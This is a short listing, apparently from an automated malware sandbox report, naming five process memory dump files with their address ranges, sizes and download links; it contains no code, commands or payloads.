memory/1816-350-0x0000000000950000-0x0000000000988000-memory.dmp

Filesize
224KB

Download
memory/1972-360-0x0000000000400000-0x0000000000402000-memory.dmp

Filesize
8KB

Download
memory/2728-267-0x0000000000940000-0x0000000000978000-memory.dmp

Filesize
224KB

Download
memory/2884-2-0x0000000000060000-0x0000000000061000-memory.dmp

Filesize
4KB

Download
memory/2884-34-0x0000000076D90000-0x0000000076D91000-memory.dmp

Filesize
4KB

Download